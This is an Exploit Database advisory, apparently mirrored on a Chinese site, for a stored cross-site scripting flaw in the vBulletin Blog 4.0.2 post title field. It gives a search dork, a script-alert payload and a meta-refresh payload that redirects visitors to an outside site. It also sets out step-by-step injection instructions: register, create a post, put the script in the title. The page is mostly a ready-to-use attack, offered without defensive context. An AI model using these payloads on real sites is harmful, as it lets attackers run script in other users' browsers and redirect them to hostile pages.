vBulletin Blog 4.0.2 – Title Cross-Site Scripting

Exploit Database
126 阅读

作者： FormatXformat

日期： 2010-03-24
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/11871/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

Vbulletin Blog 4.0.2 XSS Vulnerability

Author: FormatXformat

Version: Vbulletin 4.0.2

Dork:

Powered by vBulletin™Version 4.0.2 Copyright © 2010 vBulletin Solutions, Inc. All rights reserved.

The script is affected by Permanent XSS vulnerability, so you can put in bad java script code

<script>alert('put this script in title')</script>

<meta http-equiv='Refresh' content='0;URL=http://db-exploit.com'>

1st register

Go to Blogs page

Create New Post

Inject your java script into Title Box

You must go back to Main page to see this XSS effect.

Greets: Neo, Sa3id, All Tkurd.net Members